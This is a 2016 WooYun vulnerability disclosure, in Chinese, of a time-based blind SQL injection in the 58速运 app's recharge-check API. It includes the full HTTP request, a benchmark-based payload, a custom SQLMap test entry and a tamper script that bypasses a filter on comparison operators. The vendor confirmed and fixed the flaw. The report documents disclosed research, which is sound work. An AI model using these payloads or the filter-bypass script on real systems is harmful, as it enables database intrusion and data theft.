当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168283

漏洞标题:58速运官方APP存在SQL注入(绕过之二次开发SQLMap+含Payload/Tamper脚本)

相关厂商:58同城

漏洞作者: 路人甲

提交时间:2016-01-08 09:55

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-08: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

APP安全之SQL注入

详细说明:

目标:58速运官方APP
检测发现以下地方存在SQL注入:(POST中的mobile,时间盲注)

POST http://suyun.guest.daojia.com/api/guest/rechargeCheak HTTP/1.1
Host: suyun.guest.daojia.com
Proxy-Connection: keep-alive
Referer: http://suyun.guest.daojia.com/api/guest/rechargeact
Content-Length: 56
Origin: http://suyun.guest.daojia.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.2; zh-cn; ZTE Grand S Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Cookie: bi_hmsr=none; bi_znsr=none; bi_hmmd=none; bi_hmpl=none; bi_hmkw=; bi_cookieid=14521820498143605725634
mobile=13888888888&planId=2015123001&imei=a0000000000000


PAYLOAD:

mobile=if(1=1,benchmark(2000000,encode('hello','goodbye')),0)


SQLMAP跑了下,发现没检测出来,可能对于=IF(1=1,SLEEP(X),0)这类的Payload比较少在SQLMap中吧,于是手工添加Payload到SQLMap中,

<test>
<title>MySQL time-based blind - Parameter replace (IF)</title>
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>3</where>
<vector>if([INFERENCE],sleep([SLEEPTIME]),0)</vector>
<request>
<payload>if([RANDNUM]=[RANDNUM],sleep([SLEEPTIME]),0)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>


加了后很快检测出来了,但是依然跑不出数据,手工检测了下发现过滤了以下参数:

><、ORD、BETWEEN


另外,sleep()函数貌似会导致程序睡很久,于是把sleep()换成benchmark,ORD换成ASCII,这两个只要在数据包出口处批量替换即可。
而对于><,可以考虑SQLMAP自带的Tamper——greatest.py,但是由于Payload是我自定义的,所以自带的greatest.py这个Tamper不适用于Payload表达式,于是自己添加了个Tamper到SQLMap中,就一个正则匹配~然后就可以用SQLMAP出数据了~

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
retVal = payload
if payload:
match = re.search(r"(if\()(ORD\(.*?\))>(\d+)", payload, re.I)
if match:
_ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(2), match.group(3), match.group(2))
retVal = retVal.replace(match.group(0), _)
return retVal

漏洞证明:

1、SQLMAP漏洞截图

sqlmap.jpg


2、列出当前数据库用户

user.jpg


3、列出当前数据库

db.jpg

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-08 12:21

厂商回复:

感谢对58安全的关注,已反馈给到家的同学。
PS:司马表示很膜拜,要请你吃饭,请和司马联系。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-08 12:24 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1838 漏洞数:152 | 如果大海能够带走我的矮丑...)

    司马表示很膜拜,要请你吃饭,请和司马联系,龙虾不吃白不吃~

  2. 2016-01-08 12:25 | 提莫 ( 普通白帽子 | Rank:102 漏洞数:8 | 五杀提莫)

    司马表示很膜拜,要请你吃饭,请和司马联系。赤裸裸的钓鱼...

  3. 2016-01-08 12:27 | 深度安全实验室 ( 核心白帽子 | Rank:2695 漏洞数:454 )

    哈哈。。。

  4. 2016-01-08 12:57 | Submit ( 普通白帽子 | Rank:526 漏洞数:118 | )

    @58同城 可以蹭饭吗

  5. 2016-01-08 14:00 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1567 漏洞数:200 | 没有最专业的农民,只有更努力地耕耘..........)

    吃饭的时候带上我

  6. 2016-01-08 14:15 | 进击的zjx ( 普通白帽子 | Rank:1465 漏洞数:179 | 1000rank目标达成!撒花……)

    我知道是谁,但是我不说。

  7. 2016-01-28 13:16 | faith ( 普通白帽子 | Rank:906 漏洞数:219 | 好好的。)

    我知道是谁,但是我不说。